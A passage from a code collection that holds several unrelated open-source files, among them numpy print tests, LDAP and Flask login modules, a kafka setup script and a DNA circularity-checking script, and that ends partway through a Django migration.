| bsd-3-clause | -5,175,451,043,334,958,000 | 38.640777 | 87 | 0.70267 | false |
gmcastil/numpy | numpy/core/tests/test_arrayprint.py | 1 | 7408 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import division, absolute_import, print_function
import sys
import numpy as np
from numpy.compat import sixu
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_equal
)
class TestArrayRepr(object):
def test_nan_inf(self):
x = np.array([np.nan, np.inf])
assert_equal(repr(x), 'array([ nan, inf])')
class TestComplexArray(TestCase):
def test_str(self):
rvals = [0, 1, -1, np.inf, -np.inf, np.nan]
cvals = [complex(rp, ip) for rp in rvals for ip in rvals]
dtypes = [np.complex64, np.cdouble, np.clongdouble]
actual = [str(np.array([c], dt)) for c in cvals for dt in dtypes]
wanted = [
'[ 0.+0.j]', '[ 0.+0.j]', '[ 0.0+0.0j]',
'[ 0.+1.j]', '[ 0.+1.j]', '[ 0.0+1.0j]',
'[ 0.-1.j]', '[ 0.-1.j]', '[ 0.0-1.0j]',
'[ 0.+infj]', '[ 0.+infj]', '[ 0.0+infj]',
'[ 0.-infj]', '[ 0.-infj]', '[ 0.0-infj]',
'[ 0.+nanj]', '[ 0.+nanj]', '[ 0.0+nanj]',
'[ 1.+0.j]', '[ 1.+0.j]', '[ 1.0+0.0j]',
'[ 1.+1.j]', '[ 1.+1.j]', '[ 1.0+1.0j]',
'[ 1.-1.j]', '[ 1.-1.j]', '[ 1.0-1.0j]',
'[ 1.+infj]', '[ 1.+infj]', '[ 1.0+infj]',
'[ 1.-infj]', '[ 1.-infj]', '[ 1.0-infj]',
'[ 1.+nanj]', '[ 1.+nanj]', '[ 1.0+nanj]',
'[-1.+0.j]', '[-1.+0.j]', '[-1.0+0.0j]',
'[-1.+1.j]', '[-1.+1.j]', '[-1.0+1.0j]',
'[-1.-1.j]', '[-1.-1.j]', '[-1.0-1.0j]',
'[-1.+infj]', '[-1.+infj]', '[-1.0+infj]',
'[-1.-infj]', '[-1.-infj]', '[-1.0-infj]',
'[-1.+nanj]', '[-1.+nanj]', '[-1.0+nanj]',
'[ inf+0.j]', '[ inf+0.j]', '[ inf+0.0j]',
'[ inf+1.j]', '[ inf+1.j]', '[ inf+1.0j]',
'[ inf-1.j]', '[ inf-1.j]', '[ inf-1.0j]',
'[ inf+infj]', '[ inf+infj]', '[ inf+infj]',
'[ inf-infj]', '[ inf-infj]', '[ inf-infj]',
'[ inf+nanj]', '[ inf+nanj]', '[ inf+nanj]',
'[-inf+0.j]', '[-inf+0.j]', '[-inf+0.0j]',
'[-inf+1.j]', '[-inf+1.j]', '[-inf+1.0j]',
'[-inf-1.j]', '[-inf-1.j]', '[-inf-1.0j]',
'[-inf+infj]', '[-inf+infj]', '[-inf+infj]',
'[-inf-infj]', '[-inf-infj]', '[-inf-infj]',
'[-inf+nanj]', '[-inf+nanj]', '[-inf+nanj]',
'[ nan+0.j]', '[ nan+0.j]', '[ nan+0.0j]',
'[ nan+1.j]', '[ nan+1.j]', '[ nan+1.0j]',
'[ nan-1.j]', '[ nan-1.j]', '[ nan-1.0j]',
'[ nan+infj]', '[ nan+infj]', '[ nan+infj]',
'[ nan-infj]', '[ nan-infj]', '[ nan-infj]',
'[ nan+nanj]', '[ nan+nanj]', '[ nan+nanj]']
for res, val in zip(actual, wanted):
assert_(res == val)
class TestArray2String(TestCase):
def test_basic(self):
"""Basic test of array2string."""
a = np.arange(3)
assert_(np.array2string(a) == '[0 1 2]')
assert_(np.array2string(a, max_line_width=4) == '[0 1\n 2]')
def test_style_keyword(self):
"""This should only apply to 0-D arrays. See #1218."""
stylestr = np.array2string(np.array(1.5),
style=lambda x: "Value in 0-D array: " + str(x))
assert_(stylestr == 'Value in 0-D array: 1.5')
def test_format_function(self):
"""Test custom format function for each element in array."""
def _format_function(x):
if np.abs(x) < 1:
return '.'
elif np.abs(x) < 2:
return 'o'
else:
return 'O'
x = np.arange(3)
if sys.version_info[0] >= 3:
x_hex = "[0x0 0x1 0x2]"
x_oct = "[0o0 0o1 0o2]"
else:
x_hex = "[0x0L 0x1L 0x2L]"
x_oct = "[0L 01L 02L]"
assert_(np.array2string(x, formatter={'all':_format_function}) ==
"[. o O]")
assert_(np.array2string(x, formatter={'int_kind':_format_function}) ==
"[. o O]")
assert_(np.array2string(x, formatter={'all':lambda x: "%.4f" % x}) ==
"[0.0000 1.0000 2.0000]")
assert_equal(np.array2string(x, formatter={'int':lambda x: hex(x)}),
x_hex)
assert_equal(np.array2string(x, formatter={'int':lambda x: oct(x)}),
x_oct)
x = np.arange(3.)
assert_(np.array2string(x, formatter={'float_kind':lambda x: "%.2f" % x}) ==
"[0.00 1.00 2.00]")
assert_(np.array2string(x, formatter={'float':lambda x: "%.2f" % x}) ==
"[0.00 1.00 2.00]")
s = np.array(['abc', 'def'])
assert_(np.array2string(s, formatter={'numpystr':lambda s: s*2}) ==
'[abcabc defdef]')
class TestPrintOptions:
"""Test getting and setting global print options."""
def setUp(self):
self.oldopts = np.get_printoptions()
def tearDown(self):
np.set_printoptions(**self.oldopts)
def test_basic(self):
x = np.array([1.5, 0, 1.234567890])
assert_equal(repr(x), "array([ 1.5 , 0. , 1.23456789])")
np.set_printoptions(precision=4)
assert_equal(repr(x), "array([ 1.5 , 0. , 1.2346])")
def test_precision_zero(self):
np.set_printoptions(precision=0)
for values, string in (
([0.], " 0."), ([.3], " 0."), ([-.3], "-0."), ([.7], " 1."),
([1.5], " 2."), ([-1.5], "-2."), ([-15.34], "-15."),
([100.], " 100."), ([.2, -1, 122.51], " 0., -1., 123."),
([0], "0"), ([-12], "-12"), ([complex(.3, -.7)], " 0.-1.j")):
x = np.array(values)
assert_equal(repr(x), "array([%s])" % string)
def test_formatter(self):
x = np.arange(3)
np.set_printoptions(formatter={'all':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
def test_formatter_reset(self):
x = np.arange(3)
np.set_printoptions(formatter={'all':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
np.set_printoptions(formatter={'int':None})
assert_equal(repr(x), "array([0, 1, 2])")
np.set_printoptions(formatter={'all':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
np.set_printoptions(formatter={'all':None})
assert_equal(repr(x), "array([0, 1, 2])")
np.set_printoptions(formatter={'int':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
np.set_printoptions(formatter={'int_kind':None})
assert_equal(repr(x), "array([0, 1, 2])")
x = np.arange(3.)
np.set_printoptions(formatter={'float':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1.0, 0.0, 1.0])")
np.set_printoptions(formatter={'float_kind':None})
assert_equal(repr(x), "array([ 0., 1., 2.])")
def test_unicode_object_array():
import sys
if sys.version_info[0] >= 3:
expected = "array(['é'], dtype=object)"
else:
expected = "array([u'\\xe9'], dtype=object)"
x = np.array([sixu('\xe9')], dtype=object)
assert_equal(repr(x), expected)
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | -4,426,322,103,313,854,500 | 39.922652 | 84 | 0.44647 | false |
Reigel/kansha | kansha/authentication/ldap/ldap_auth.py | 1 | 4186 | # -*- coding:utf-8 -*-
# --
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
# --
from nagare import log
try:
import ldap
except ImportError:
ldap = None
import sys
import types
def toUTF8(v):
if isinstance(v, unicode):
return v.encode('utf-8')
elif isinstance(v, (types.TupleType, types.ListType)):
return [toUTF8(e) for e in v]
elif isinstance(v, types.DictType):
return dict([(toUTF8(k), toUTF8(v_)) for k, v_ in v.items()])
else:
return v
class LDAPAuth(object):
def __init__(self, ldap_cfg):
ldap_cfg = toUTF8(ldap_cfg)
self.server = "ldap://%s:%s" % (ldap_cfg['host'], ldap_cfg['port'])
self.users_base_dn = ldap_cfg['users_base_dn']
def connect(self):
"""Connect to LDAP server
Return:
- a server connection
"""
assert ldap, 'python_ldap not installed'
return ldap.initialize(self.server)
def get_user_dn(self, uid):
raise NotImplementedError()
def check_password(self, uid, password):
"""Check if the specified couple user/password is correct
In:
- ``uid`` -- the user id
- ``password`` -- the user password
Return:
- True if password is checked
"""
c = self.connect()
dn = self.get_user_dn(uid)
# Try to authenticate
try:
c.simple_bind_s(dn, password.encode('UTF-8'))
return True
except ldap.INVALID_CREDENTIALS:
log.info("Bad credentials for DN %r" % dn)
except ldap.SERVER_DOWN:
log.critical("LDAP server down")
finally:
c.unbind()
def get_profile(self, uid, password):
raise NotImplementedError()
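# Two concrete backends follow: NngLDAPAuth builds a DN from the uid and the
# configured users_base_dn, while ADLDAPAuth binds with the userPrincipalName
# directly and then looks the account up by that attribute, as Active
# Directory expects.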
class NngLDAPAuth(LDAPAuth):
def get_user_dn(self, uid):
"""Construct a user DN given an user id
In:
- ``uid`` -- the user id
Return:
- a string, the user DN
"""
return 'uid=%s,%s' % (ldap.dn.escape_dn_chars(toUTF8(uid)), self.users_base_dn)
def get_profile(self, uid, password):
c = self.connect()
ldap_result = c.search_s(self.get_user_dn(uid), ldap.SCOPE_BASE)[0][1]
profile = {}
profile['uid'] = ldap_result['uid'][0]
profile['name'] = ldap_result['displayName'][0].decode('utf-8')
profile['email'] = ldap_result['mail'][0]
profile['picture'] = ldap_result['jpegPhoto'][0] if 'jpegPhoto' in ldap_result else None
return profile
class ADLDAPAuth(LDAPAuth):
def connect(self):
conn = super(ADLDAPAuth, self).connect()
conn.set_option(ldap.OPT_REFERRALS, 0)
conn.protocol_version = 3
return conn
def check_password(self, uid, password):
"""Check if the specified couple user/password is correct
In:
- ``uid`` -- the user id
- ``password`` -- the user password
Return:
- True if password is checked
"""
c = self.connect()
# Try to authenticate
try:
c.simple_bind_s(uid, password)
return True
except ldap.INVALID_CREDENTIALS:
log.info("Bad credentials for uid %r" % uid)
except ldap.SERVER_DOWN:
log.critical("LDAP server down")
finally:
c.unbind()
def get_profile(self, uid, password):
c = self.connect()
c.simple_bind_s(uid, password)
ldap_result = c.search_s(self.users_base_dn, ldap.SCOPE_SUBTREE,
'(userPrincipalName=%s)' % ldap.dn.escape_dn_chars(toUTF8(uid)))[0][1]
profile = {}
profile['uid'] = ldap_result['sAMAccountName'][0]
profile['name'] = ldap_result['displayName'][0].decode('utf-8')
profile['email'] = ldap_result.get('mail', [''])[0]
profile['picture'] = ldap_result['thumbnailPhoto'][0] if 'thumbnailPhoto' in ldap_result else None
c.unbind()
return profile
| bsd-3-clause | 3,308,616,112,407,735,300 | 29.779412 | 106 | 0.567845 | false |
CrowdStrike/kafka-python | setup.py | 1 | 1752 | import sys
from setuptools import setup, Command
with open('VERSION', 'r') as v:
__version__ = v.read().rstrip()
class Tox(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
@classmethod
def run(cls):
import tox
sys.exit(tox.cmdline([]))
test_require = ['tox', 'mock']
if sys.version_info < (2, 7):
test_require.append('unittest2')
setup(
name="kafka-python",
version=__version__,
tests_require=test_require,
cmdclass={"test": Tox},
packages=[
"kafka",
"kafka.consumer",
"kafka.partitioner",
"kafka.producer",
],
author="David Arthur",
author_email="[email protected]",
url="https://github.com/mumrah/kafka-python",
license="Apache License 2.0",
description="Pure Python client for Apache Kafka",
long_description="""
This module provides low-level protocol support for Apache Kafka as well as
high-level consumer and producer classes. Request batching is supported by the
protocol as well as broker-aware request routing. Gzip and Snappy compression
is also supported for message sets.
""",
keywords="apache kafka",
install_requires=['six'],
classifiers = [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| apache-2.0 | 5,926,308,993,090,215,000 | 24.764706 | 78 | 0.627283 | false |
davy39/eric | eric6_trpreviewer.py | 1 | 2399 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2004 - 2014 Detlev Offenbach <[email protected]>
#
"""
Eric6 TR Previewer.
This is the main Python script that performs the necessary initialization
of the tr previewer and starts the Qt event loop. This is a standalone version
of the integrated tr previewer.
"""
from __future__ import unicode_literals
import Toolbox.PyQt4ImportHook # __IGNORE_WARNING__
try: # Only for Py2
import Utilities.compatibility_fixes # __IGNORE_WARNING__
except (ImportError):
pass
import sys
for arg in sys.argv:
if arg.startswith("--config="):
import Globals
configDir = arg.replace("--config=", "")
Globals.setConfigDir(configDir)
sys.argv.remove(arg)
break
from E5Gui.E5Application import E5Application
from Tools.TRSingleApplication import TRSingleApplicationClient
from Globals import AppInfo
from Toolbox import Startup
def createMainWidget(argv):
"""
Function to create the main widget.
@param argv list of commandline parameters (list of strings)
@return reference to the main widget (QWidget)
"""
from Tools.TRPreviewer import TRPreviewer
if len(argv) > 1:
files = argv[1:]
else:
files = []
previewer = TRPreviewer(files, None, 'TRPreviewer')
return previewer
def main():
"""
Main entry point into the application.
"""
options = [
("--config=configDir",
"use the given directory as the one containing the config files"),
]
appinfo = AppInfo.makeAppInfo(sys.argv,
"Eric6 TR Previewer",
"file",
"TR file previewer",
options)
app = E5Application(sys.argv)
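# If a previewer instance is already running, hand the file arguments over to
# it through the single-application client and exit; otherwise fall through
# and start a new application instance.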
client = TRSingleApplicationClient()
res = client.connect()
if res > 0:
if len(sys.argv) > 1:
client.processArgs(sys.argv[1:])
sys.exit(0)
elif res < 0:
print("eric6_trpreviewer: {0}".format(client.errstr()))
sys.exit(res)
else:
res = Startup.simpleAppStartup(sys.argv,
appinfo,
createMainWidget,
app=app)
sys.exit(res)
if __name__ == '__main__':
main()
| gpl-3.0 | -8,780,271,109,807,929,000 | 25.076087 | 78 | 0.581909 | false |
chrishah/MITObim | misc_scripts/circules.py | 2 | 14307 | #!/usr/bin/python
import sys,warnings
import argparse
VERSION="0.5"
DESCRIPTION='''
circules - checks for circularity in nucleotide sequences
version: v.%s
# Disclaimer: #
The script is currently in the beta phase. Any feedback is much appreciated.
''' %VERSION
kmers = []
dic = {}
seqs = {}
motifs_by_regions = {}
#auto=True
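# write_clipped: writes the clipped, putatively circular sequence to
# '<prefix>.circular.<length>.fasta' and also writes a
# '<prefix>.<length>.for-testing.fasta' file containing the last and first
# 500 bp joined across the clip point, so the junction can be checked (e.g. by
# mapping reads against it).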
def write_clipped(seq_header, seq_seq, start, end, prefix):
start = int(start)
end = int(end)
l = str(end - start)
#writing out clipped sequence
print "clip points: %i - %i - length: %s -> writing sequence to '%s.circular.%s.fasta'\n" %(start, end, l, prefix, l)
sequence = seq_seq[start:end]
out = open(prefix+'.circular.'+l+'.fasta','w')
out.write(">%s_ciruclar_%s\n%s\n" %(seq_header, str(l), sequence))
out.close()
#writing out file for testing circularity
out = open(prefix+'.'+l+'.for-testing.fasta','w')
clip_from = start
clip_to = end
sequence = seq_seq[clip_to-500:clip_to]+seq_seq[clip_from:clip_from+500]
out.write(">test_%s\n%s\n" %(str(l),sequence))
out.close()
def roll_over(seq_seq, new_start, prefix):
print "new start coordinate: %s -> writing sequence to '%s.roll.%s.fasta'\n" %(new_start, prefix, new_start)
sequence = seq_seq[new_start-1:]+seq_seq[:new_start-1]
out = open(prefix+'.rolled.'+str(new_start)+'.fasta', 'w')
out.write(">%s_s%s_l%s\n%s\n" %(prefix, new_start, len(sequence), sequence))
out.close()
parser = argparse.ArgumentParser(description=DESCRIPTION, prog='circules.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=''' examples:
# check for circularity using a k-mer length of 31 - returns suggestion(s) for clipping points in putative circular sequences.
circules.py -f test.fasta -k 31
# check for circularity using k-mer lengths 31-51, stepsize 2bp - returns suggestion(s) for clipping points in putative circular sequences.
circules.py -f test.fasta -k 31-51 -s 2
# check for circularity using a k-mer length of 31. If the length of a suggested circular sequence matches the expected length (15000 bp; length tolerance defaults to 0)
# the clipped sequence will be written to a file called 'mytest.circular.fasta'. In addition a file 'mytest.for-testing.fasta' will be written. It contains
# a 1000 bp sequence obtained by joining the first/last 500 bp of the proposed clipped circular sequence for additional evaluation if required.
circules.py -f test.fasta -k 31 -l 15000 -p mytest
# check for circularity using a k-mer length of 41. Extract if candidate is found in length range 9000 - 11000.
circules.py -f test.fasta -k 41 -l 10000 --length_tolerance_percent 0.1
# clip sequence at specific clip points
circules.py -f test.fasta -c 32,15430
# roll circular sequence to new startposition, e.g. 46
circules.py -f test.fasta -n 46
''')
parser.add_argument("-f", "--fasta", help="fasta file containing the sequence to be evaluate.", metavar="<FILE>", action="store")
parser.add_argument("-k", "--kmer", help="kmer size. single number (default = 31) or range (e.g. 31-35).", type=str, default='31', action="store")
parser.add_argument("-s", "--kmer_step", help="kmer step size (default = 2).", type=int, default='2', action="store")
parser.add_argument("-p", "--prefix", help="prefix for output files (default = 'circular').", type=str, metavar="<STR>", action="store", default='circular')
parser.add_argument("-c", "--extract_by_coordinates", help="Coordinates for clipping of sequence in format 'startpos,endpos'. Clipped sequence will be written to file 'prefix.circular.fasta'.", type=str, metavar="<INT,INT>", action="store")
parser.add_argument("-l", "--extract_by_length", help="expected length (in bp) of circular molecule. If a candidate of length expected (+-length tolerance if specified) is found, sequence will be clipped and written to file 'prefix.circular.fasta'.", type=int, metavar="<INT>", default='0', action="store")
parser.add_argument("--length_tolerance_percent", help="percent length tolerance (e.g. 0.1, for 10 %%). Candidate fragments must have a length of 'expected length +/- t * expected length'. Default = 0.", type=float, metavar="<FLOAT>", default='0', action="store")
parser.add_argument("--length_tolerance_absolute", help="absolute length tolerance (e.g. 1000). Candidate fragments must have a length of 'expected length +/- tolerance'. Default = 0.", type=int, metavar="<INT>", default='0', action="store")
parser.add_argument("-n", "--newstart_roll", help="'roll' a putative ciruclar sequence to a specified new start point. Sequence will be written to file 'prefix.roll.{n}.fasta'.", type=int, metavar="<INT>", default='0', action="store")
#parser.add_argument("-r", "--readpool", help="path to fastq reads to be used for evaluating circularity.", type=str, metavar="<FILE>", action="store")
#parser.add_argument("-v", "--verbose", help="turn verbose output on.", action="store_true")
parser.add_argument("--version", action="version", version=VERSION)
args = parser.parse_args()
if len(sys.argv) < 2: #if the script is called without any arguments display the usage
print
print "%s\n" %DESCRIPTION
parser.print_usage()
print
sys.exit(1)
if '-' in args.kmer:
kmers = args.kmer.strip().split("-")
kmers.append(args.kmer_step)
for i in range(len(kmers)):
kmers[i] = int(kmers[i])
else:
kmers = [int(args.kmer),int(args.kmer)+1, 1]
fa = open(args.fasta,'r')
for l in fa:
if l.startswith('>'):
current = l.strip().replace('>','')
seqs[current] = ''
else:
seqs[current]+=l.strip().upper()
if len(seqs) > 1:
print "\nThe file '%s' contains %i sequences. The circules script is currently designed to only handle a single fasta sequence at a time - Sorry!\n" %(args.fasta, len(seqs))
sys.exit()
print "%s\n" %DESCRIPTION
print "\n###########################\n\nProcessing sequence of length %s" %len(seqs[seqs.keys()[0]])
if args.newstart_roll:
print "\n####################\n## Result output ##\n####################\n"
print "\n'Rolling' circular sequence to new start coordinate .."
roll_over(seqs[seqs.keys()[0]], args.newstart_roll, args.prefix)
print ""
sys.exit()
if args.extract_by_coordinates:
if not ',' in args.extract_by_coordinates:
print "Expecting clipping coordinates delimited by comma (','), e.g. '-c 50,1567'"
sys.exit()
print "\n####################\n## Result output ##\n####################\n"
print "\nExtracting sequence by coordinates .."
clips = args.extract_by_coordinates.split(",")
write_clipped(seqs.keys()[0], seqs[seqs.keys()[0]], clips[0], clips[1], args.prefix)
print ""
sys.exit()
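# Main scan: for every k in the requested range, record the positions of all
# unambiguous k-mers. A k-mer seen exactly twice marks a candidate clip point
# (the distance between its two occurrences is the putative circular length);
# k-mers seen more than twice are collected as repeats and reported separately.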
for k in range(kmers[0],kmers[1],kmers[2]):
clips = {}
repeats = {}
for s in seqs:
print "\nCollecting %s-mers .." %k,
i=0
while i <= (len(seqs[s])-k):
kmer = str(seqs[s][i:i+k])
# print i,kmer,
if not kmer[-1] in 'acgtACGT':
# print "\tlast base of current kmer is ambiguous - jumping ahead by %s bases" %k
# i+=k
skip = k
ok = False
while ok == False:
i+=skip
kmer = str(seqs[s][i:i+k])
skip = 0
# print "%i %s" %(i, kmer)
for pos in reversed(range(len(kmer))):
# print pos,kmer[pos]
if not kmer[pos] in 'acgtACGT':
# print "%i\tambiguous" %pos
skip = pos+1
break
if skip == 0:
ok = True
continue
if not kmer in dic:
dic[kmer] = []
dic[kmer].append(i)
# print "\tok"
i+=1
print "Done!"
print "Evaluating %s-mers .." %k,
for s in seqs:
test = {}
i=0
while i <= (len(seqs[s])-k):
kmer = str(seqs[s][i:i+k])
if not kmer in dic:
evaluate = False
else:
evaluate = True
if evaluate:
count = len(dic[kmer]) #this is the number of times the current kmer was found
if count == 2:
length = dic[kmer][1]-dic[kmer][0]
if not length in clips:
clips[length] = []
clips[length].append(dic[kmer])
elif count > 2:
if not kmer in repeats:
repeats[kmer] = []
repeats[kmer].extend(dic[kmer])
i+=1
print "Done!\n"
if repeats:
print "\n###################\n## Repeat report ##\n###################"
tandem = {}
for kmer in repeats:
repeats[kmer] = sorted(list(set(repeats[kmer])))
# print "\n%s %s" %(kmer,repeats[kmer])
#find blocks
block = False
blocks = [[],[]]
dists = {}
for i in range(len(repeats[kmer])-1):
neighbour_dist = repeats[kmer][i+1] - repeats[kmer][i]
if not neighbour_dist in dists:
dists[neighbour_dist] = 0
dists[neighbour_dist]+=1
# print "%s vs %s" %(repeats[kmer][i],repeats[kmer][i+1])
if neighbour_dist <= k:
if not block:
blocks[0].append(repeats[kmer][i])
blocks[1].append(repeats[kmer][i+1]+k)
block = True
else:
blocks[1][-1] = repeats[kmer][i+1]+k
else:
if not block:
blocks[0].append(repeats[kmer][i])
blocks[1].append(repeats[kmer][i]+k)
block = False
if not block:
blocks[0].append(repeats[kmer][-1])
blocks[1].append(repeats[kmer][-1]+k)
tandem[int(blocks[0][0])] = blocks
tandem[int(blocks[0][0])].append(dists)
if tandem:
motifs = []
start_positions = sorted(tandem)
active = False
for i in range(len(start_positions)-1):
if (start_positions[i+1] - start_positions[i]) == 1:
if not active:
motifs.append([start_positions[i],start_positions[i+1]])
active = True
else:
motifs[-1][-1] = start_positions[i+1]
else:
if not active:
motifs.append([start_positions[i],start_positions[i]])
active=False
if not active:
motifs.append([start_positions[-1],start_positions[-1]])
for m in motifs:
block_start_end_coordinates = {}
minstep = int(sorted(tandem[m[0]][2])[0])
coordinates = range(m[0],m[1]+1)
if minstep >= k:
m[1]+=k-1
elif minstep > (m[1]+1-m[0]):
m[1]=m[0]+minstep-1
for c in coordinates: #this loop finds the start and end position of each block
for i in range(len(tandem[c][0])):
if not i in block_start_end_coordinates:
block_start_end_coordinates[i] = [tandem[c][0][i],tandem[c][1][i]]
if tandem[c][0][i] < block_start_end_coordinates[i][0]:
block_start_end_coordinates[i][0] = tandem[c][0][i]
if tandem[c][1][i] > block_start_end_coordinates[i][1]:
block_start_end_coordinates[i][1] = tandem[c][1][i]
motif = seqs[s][m[0]:m[1]+1]
if not motif in motifs_by_regions:
motifs_by_regions[motif] = []
print "\nmotif '%s', found multiple times in the following region(s) (start - end coordinate):" %seqs[s][m[0]:m[1]+1]
for b in sorted(block_start_end_coordinates):
# print b,block_start_end_coordinates[b]
start = block_start_end_coordinates[b][0]
end = block_start_end_coordinates[b][1]
print "%i - %i (%i x)" %(start, end, (end-start)/(m[1]-m[0]+1))
# print seqs[s][start:end+1]
# print len(seqs[s])
motifs_by_regions[motif].append([start,end])
print "\n########################\n## Circularity report ##\n########################"
nothing = True
if len(clips) >= 1:
print "\nFound %i candidate(s) for circularity supported by duplicated %i-mers:" %(len(clips), k)
for l in sorted(clips):
print "\t- suggested clip points %i - %i (length %s; supported by %i duplicted %i-mers); extract by adding '-l %i' or '-c %s,%s' to your command" %(int(clips[l][0][0]), int(clips[l][0][1]), l, len(clips[l])/2, k, l, clips[l][0][0], clips[l][0][1])
nothing = False
if motifs_by_regions:
for m in motifs_by_regions:
primes = [0]
for i in range(len(motifs_by_regions[m])):
if motifs_by_regions[m][i][0] == 0:
primes[0] = i
if motifs_by_regions[m][i][1] == len(seqs[s]):
primes.append(i)
if len(primes) == 2:
print "\nFound motif '%s' at terminal positions (see 'Repeat report' above), which could indicate circularity." %m
start_clip = motifs_by_regions[m][primes[0]][1]
end_clip = motifs_by_regions[m][primes[1]][1]
print "\t- suggested clip points: %s - %s (length %s); extract the clipped sequence by adding '-c %s,%s' to your command" %(start_clip, end_clip, end_clip-start_clip, start_clip, end_clip)
print "\n\tThis will remove the repeated motif from the 5' end of the sequence.\n\tThe correct length can currently not be determined unambiguously because of the repeat. Longer reads could resolve this.\n"
sys.exit()
if nothing:
print "\nDid not find any candidates for circularity using k = %s\n" %k
sys.exit()
print ""
if args.extract_by_length:
print "\n####################\n## Result output ##\n####################\n"
print "Extracting by expected length .."
if args.length_tolerance_absolute:
minlength = args.extract_by_length - args.length_tolerance_absolute
maxlength = args.extract_by_length + args.length_tolerance_absolute
elif args.length_tolerance_percent:
minlength = float(args.extract_by_length)*(1-args.length_tolerance_percent)
maxlength = float(args.extract_by_length)*(1+args.length_tolerance_percent)
else:
minlength = args.extract_by_length
maxlength = minlength
print "specified length: %s (tolerance: %s - %s) - Evaluating candidate lengths" %(args.extract_by_length, minlength, maxlength)
for l in sorted(clips):
if l <= maxlength and l >= minlength:
pass
else:
del(clips[l])
if clips:
print "\nFound candidates in the expected length range"
for s in seqs:
for l in sorted(clips):
write_clipped(s, seqs[s], clips[l][0][0], clips[l][0][1], args.prefix)
#writing out clipped sequence
# print "length: %s - clip points: %i - %i -> writing sequence to '%s.circular.%s.fasta'\n" %(str(l), int(clips[l][0][0]), int(clips[l][0][1]), args.prefix, str(l))
# sequence = seqs[s][int(clips[l][0][0]):int(clips[l][0][1])]
# out = open(args.prefix+'.circular.'+str(l)+'.fasta','w')
# out.write(">%s_ciruclar_%s\n%s\n" %(s, str(l), sequence))
# out.close()
# #writing out file for testing circularity
# out = open(args.prefix+'.'+str(l)+'.for-testing.fasta','w')
# clip_from = int(clips[l][0][0])
# clip_to = int(clips[l][0][1])
# sequence = seqs[s][clip_to-500:clip_to]+seqs[s][clip_from:clip_from+500]
# out.write(">test_%s\n%s\n" %(str(l),sequence))
# out.close()
else:
print "\nDid not find any candidates in the specified length range\n"
| mit | 5,351,275,712,881,326,000 | 36.064767 | 307 | 0.638499 | false |
h-friederich/lpm | login.py | 1 | 3179 | from functools import wraps
from flask import Blueprint, request, redirect, render_template, url_for, g, flash
from flask.ext.login import LoginManager, login_user, logout_user, current_user
from flask_wtf import Form
from wtforms import StringField, PasswordField
import base64
from . import auth
login_manager = LoginManager()
login_manager.login_view = 'login.login'
bp = Blueprint('login', __name__)
def init(app):
login_manager.init_app(app)
auth.init(app)
class LoginForm(Form):
    # Note: no input validation, submitted value will be handled in the auth module itself
# otherwise we'd have to fetch the full user list for every login
username = StringField('User')
password = PasswordField('Password')
@bp.route('/login', methods=["GET", "POST"])
def login():
"""
Presents the login page
If login data is POSTed, the credentials are validated and the user logged in if successful
"""
form = LoginForm()
if request.method == 'POST' and form.is_submitted():
usr = auth.auth_user(form.username.data, form.password.data)
if usr and usr.has_role('login') and usr.is_active:
login_user(usr)
return redirect(request.args.get('next') or url_for('items.overview'))
elif usr is None:
flash('invalid credentials', 'error')
elif not usr.is_active:
flash('login expired', 'error')
else:
flash('insufficient permissions', 'error')
return render_template('login.html', form=form)
@bp.route('/logout')
def logout():
"""
Performs a logout on the user
"""
logout_user()
return redirect(url_for('login.login'))
def role_required(roles):
"""
Decorator that ensures the current user has
- one of the specified roles (if a tuple)
- the specified role (otherwise)
"""
def real_role_required(f):
@wraps(f)
def wrapper(*args, **kwargs):
introles = roles
if not isinstance(introles, tuple):
introles = (introles,)
valid = False
if current_user.is_authenticated:
for role in introles:
if current_user.has_role(role):
valid = True
break
if not valid:
flash('insufficient privileges to access this page', 'danger')
return login_manager.unauthorized()
return f(*args, **kwargs)
return wrapper
return real_role_required
@login_manager.user_loader
def load_user(username):
"""
Default user loader for the login plugin
"""
return auth.get_user(username)
@login_manager.request_loader
def load_from_request(request):
"""
User loader from basic authorization header
(i.e. for external API)
"""
try:
authinfo = request.headers.get('Authorization', '').replace('Basic ', '', 1)
username, password = base64.b64decode(authinfo).decode('utf-8').split(':')
except:
return None
usr = auth.auth_user(username, password)
if usr and usr.has_role('request_login'):
return usr
return None | bsd-3-clause | 5,078,731,911,012,853,000 | 29 | 95 | 0.621579 | false |
diegonalvarez/tournament-stats | equipos/migrations/0001_initial.py | 1 | 5904 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Equipo'
db.create_table(u'equipos_equipo', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=120)),
('timestamp', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('complejo_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['complejos.Complejo'])),
))
db.send_create_signal(u'equipos', ['Equipo'])
def backwards(self, orm):
# Deleting model 'Equipo'
db.delete_table(u'equipos_equipo')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
